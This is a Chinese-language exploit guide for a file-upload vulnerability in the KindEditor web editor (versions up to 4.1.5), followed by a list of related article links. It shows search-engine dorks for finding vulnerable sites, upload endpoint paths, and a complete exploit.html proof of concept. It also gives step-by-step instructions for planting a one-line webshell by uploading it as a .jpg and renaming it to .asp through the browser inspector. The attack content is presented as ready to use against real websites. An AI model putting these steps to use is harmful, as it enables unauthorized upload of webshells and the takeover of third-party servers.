[应用漏洞]KindEditor<=4.1.5 文件上传漏洞利用
一、KindEditor
KindEditor 是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果
二、漏洞介绍
影响版本:KindEditor 3.5.2~4.1
简介:Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持
Java、.NET、PHP、ASP等程序。
漏洞存在证明:
根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php
可目录变量查看是否存在脚本上传漏洞:
kindeditor/asp/upload_json.asp?dir=file
kindeditor/asp.net/upload_json.ashx?dir=file
kindeditor/jsp/upload_json.jsp?dir=file
kindeditor/php/upload_json.php?dir=file
利用方式1
步骤:
- 通过搜索引擎找到目标,比如:搜索关键字 inurl:com/kindeditor
- 通过访问http://www.xx.com/kindeditor/kindeditor.js,查看kindeditor版本是否含有漏洞(<=4.1.5)
- 获得网站使用的开发语言,并确定kindeditor上传文件地址,各种语言上传地址如下:
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php - 创建exploit.html页面,编辑内容如下:
<html><head><title>kindeditor exploit</title><script src="http://www.xx.gov.cn/kindeditor/kindeditor.js"></script><script>KindEditor.ready(function(K) {var uploadbutton = K.uploadbutton({button : K('#uploadButton')[0], fieldName : 'imgFile'url : 'http://【url】/kindeditor/asp.net/upload_json.ashx?dir=file', afterUpload : function(data) {if (data.error === 0) {var url = K.formatUrl(data.url, 'absolute');K('#url').val(url);}},});uploadbutton.fileBox.change(function(e) {uploadbutton.submit();});});</script></head><body><div class="upload"><input type="button" id="uploadButton" value="Upload" /></div></body></html>
该poc上传到服务器后,即可执行上传操作:
利用方式2
打开编辑器,将一句话改名为1.jpg 上传图片,
打开文件管理,进入“down”目录,跳至尾页,最后一个图片既是我们上传的一句话
点击改名
打开谷歌浏览器的 审查元素
找到form表单
修改“jpg”为“asp”
名字修改为 1 保存
一句话就生成了,连接地址为
http://Madman.in/upfiles/down/1.asp
[应用漏洞]KindEditor<=4.1.5 文件上传漏洞利用相关推荐
- kindeditor php 漏洞,kindeditor=4.1.5 文件上传漏洞 | CN-SEC 中文网
摘要 漏洞存在于 kindeditor 编辑器里,你能上传. txt 和. html 文件,支持 php/asp/jsp/asp.net 漏洞存在于 kindeditor 编辑器里,你能上传. txt ...
- kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor=4.1.5 文件上传漏洞利用...
kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use 漏洞存影响版本:小于等于4. ...
- php kindeditor 文件不存在_不能取得文件类型!,kindeditor=4.1.5文件上传漏洞复现
原标题:kindeditor<=4.1.5文件上传漏洞复现 0x00:背景 KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE.Fire ...
- 织梦guestbook.php漏洞,DEDE:织梦漏洞修复(含任意文件上传漏洞与注入漏洞)
这几天阿里频繁提醒网站有漏洞,搞得我不胜其烦,好吧,我修复还不行吗?搜索之后整理如下,仅供参考(5.7以上版本适用): 任意文件上传漏洞修复 一./include/dialog/select_soft ...
- fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
一.编辑器漏洞 1.编辑器 编辑器属于第三方软件,它的作用是方便网站管理员上传或编辑网站上的内容,类似我们电脑上的Word文档. 编辑器通常分为两种情况: (1) 不需要后台验证,可以直接在前台访问且 ...
- kindeditor=4.1.5文件上传漏洞复现
0x00:背景 KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE.Firefox.Chrome.Safari.Opera等主流浏览器. 0x ...
- struts2 ajax上传文件 file空_WordPress插件漏洞分析:WPDiscuz任意文件上传漏洞
写在前面的话 就在不久之前,Wordfence的威胁情报团队在一款名叫wpDiscuz的Wordpress评论插件中发现了一个高危漏洞,而这款插件目前已有超过80000个网站在使用了.这个漏洞将允许未 ...
- html 编辑器编码漏洞,某富文本编辑器文件上传漏洞(小论如何控制IsPostBack的值) | CN-SEC 中文网...
在这个文本编辑器上没有找到任何按钮是可以直接上传文件的(只有插入文件上传按钮,没啥用),但是代码里面是隐藏有这样一个功能的: code 区域 protected override void Rende ...
- uploadify.php 漏洞,PhotoStore “uploadify.php”任意文件上传漏洞
发布日期:2014-01-08 更新日期:2014-01-12 受影响系统: ktools PhotoStore 4.0.7 描述: --------------------------------- ...
- 文件上传漏洞ED01-CMS v20180505 存在任意文件上传漏洞
进入登陆页面我们弱口令admin:admin登录成功: 登录后我们进入user目录上传图片: 我们上传shell.png,抓包修改为shell.php; <?php system($_GET(1 ...
最新文章
- FuzzyCMeans算法
- repo同步代码_iTOP-4412开发板android4.0代码下载和编译
- 内网虚拟服务器怎么固定域名,如何让自己的局域网用(虚拟的)域名访问?
- 机器学习过拟合---范数
- python语言入门详解-Python unittest详解一(基础入门)
- 2014年ENVI/IDL遥感应用与开发培训班-11月重庆站 開始报名了
- 2017.10.27 sue的小球 失败总结
- WPS Office 2019 For Linux 8722 发布,引入pdf组件
- 关于科来网络分析系统的激活
- 小白记事本--JAVA入门
- 《那些花儿》范玮琪版
- RabbitMQ WEB管理端
- 算法课 - 最大流问题
- 工作流软件哪个好?介绍几款知名的工作流软件
- android 置灰不可点击,android 按钮置灰效果
- ORACLE使用DBLINK导入导出数据
- Caj论文转pdf(带书签目录)
- 2023最新大数据毕业设计论文题目(117篇)
- 360抢夺“度娘”?
- 张小军详解华为区块链政务应用,指出区块链的应用领域正从金融向全领域拓展...